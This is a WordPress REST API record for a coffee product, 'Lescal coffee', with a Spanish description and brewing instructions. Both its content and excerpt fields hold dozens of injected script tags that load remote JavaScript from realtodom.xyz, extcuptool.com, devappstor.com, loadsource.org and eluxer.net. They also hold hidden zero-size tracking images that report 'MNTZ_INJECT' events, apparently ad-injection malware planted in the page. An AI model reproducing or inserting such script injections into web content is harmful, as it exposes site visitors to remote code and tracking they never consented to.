{"id":586,"date":"2018-07-23T16:39:05","date_gmt":"2018-07-23T16:39:05","guid":{"rendered":"http:\/\/healthandpower.com.co\/?post_type=product&#038;p=586"},"modified":"2018-09-13T17:46:28","modified_gmt":"2018-09-13T17:46:28","slug":"lescal-coffee","status":"publish","type":"product","link":"http:\/\/healthandpower.com.co\/?product=lescal-coffee","title":{"rendered":"Lescal coffee"},"content":{"rendered":"<p>Es uno de los caf\u00e9s de m\u00e1s alta calidad, elaborado con los mejores granos seleccionados producidos en el centro y sur del departamento del Cauca en Colombia.<\/p>\n<p><b>Preparaci\u00f3n: <\/b>Disfrute este caf\u00e9 prepar\u00e1ndolo\u00a0con agua pura y utilizando\u00a0recipientes limpios. Por cada 100cc de agua use 5 a 7g de<b> LESCAL COFFEE <\/b>cuchara sopera rasa o colmada al gusto.<\/p>\n<p><strong>Recomendaci\u00f3n:\u00a0<\/strong>No hierva ni caliente el caf\u00e9. Despu\u00e9s de abierto el recipiente cons\u00famalo en el menor tiempo posible.<\/p>\n<p><strong>Elaborado y manufacturado por:<\/strong> Empacados L\u00f3pez Santamar\u00eda, el Tambo Cauca. Para comercializadora LESC<\/p>\n<p><strong>Registro sanitario N\u00b0 NSA-005442-2018<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_987603651&amp;key=1b378c47aa1d605558&amp;cv=1532363956&amp;t=1532363957493\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_959750590&amp;key=1b378c47aa1d605558&amp;cv=59956&amp;t=1532363957493\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1532633695850\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1532633695850\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1532633695851\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=OPTOUT_RESPONSE_OK&amp;t=1532633697826\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_746479052&amp;key=1b378c47aa1d605558&amp;cv=1532633696&amp;t=1532633697827\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_24501734&amp;key=1b378c47aa1d605558&amp;cv=60001&amp;t=1532633697827\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532633697829\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532633697830\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532633697833\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532633697835\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532633698616\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1534612907601\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1534612907601\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1534612907602\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=OPTOUT_RESPONSE_OK&amp;t=1534612910736\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_216492667&amp;key=1b378c47aa1d605558&amp;cv=1534612908&amp;t=1534612910736\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_601876389&amp;key=1b378c47aa1d605558&amp;cv=17973&amp;t=1534612910737\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1534612910739\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/extcuptool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1534612910740\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1534612910742\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/extcuptool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1534612910744\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1534612910748\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/extcuptool.com\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1534612910749\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/extcuptool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1536860373066\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1536860373067\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1536860373067\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=OPTOUT_RESPONSE_OK&amp;t=1536860375663\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/devappstor.com\/optout\/set\/lat?jsonp=__twb_cb_598566010&amp;key=1b378c47aa1d605558&amp;cv=1536860373&amp;t=1536860375663\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/devappstor.com\/optout\/set\/lt?jsonp=__twb_cb_283789952&amp;key=1b378c47aa1d605558&amp;cv=15173&amp;t=1536860375664\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1536860375666\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/devappstor.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1536860375668\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1536860375669\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/devappstor.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/devappstor.com\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1536860375671\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/devappstor.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/devappstor.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<h1><span style=\"color: #00ccff;\">$9.000<\/span><\/h1>\n<p>Cafe molido y tostado, rico y delicioso aroma<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=43\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_778265257&amp;key=1b378c47aa1d605558&amp;cv=1532363956&amp;t=1532363959008\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_968451593&amp;key=1b378c47aa1d605558&amp;cv=59956&amp;t=1532363959008\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=9\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532631763941\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532633025837\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532633379692\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=LOADED&amp;custom1=healthandpower.com.co&amp;custom2=\/wp-admin\/post.php&amp;t=1532633695856\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=BEFORE_OPTOUT_REQ&amp;t=1532633695856\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/get?jsonp=__twb_cb_138180544&amp;key=1b378c47aa1d605558&amp;t=1532633695856\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=FINISHED&amp;custom1=healthandpower.com.co&amp;t=1532633695857\" alt=\"\" \/><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532633724242\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1534612914192\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1534613001589\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/devappstor.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1536860377256\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/devappstor.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"http:\/\/devappstor.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1536860677670\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/devappstor.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":605,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[51],"product_tag":[],"class_list":{"0":"post-586","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-bebidas-y-refrescos","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"_links":{"self":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product\/586","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=586"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/media\/605"}],"wp:attachment":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=586"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=586"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=586"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=586"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}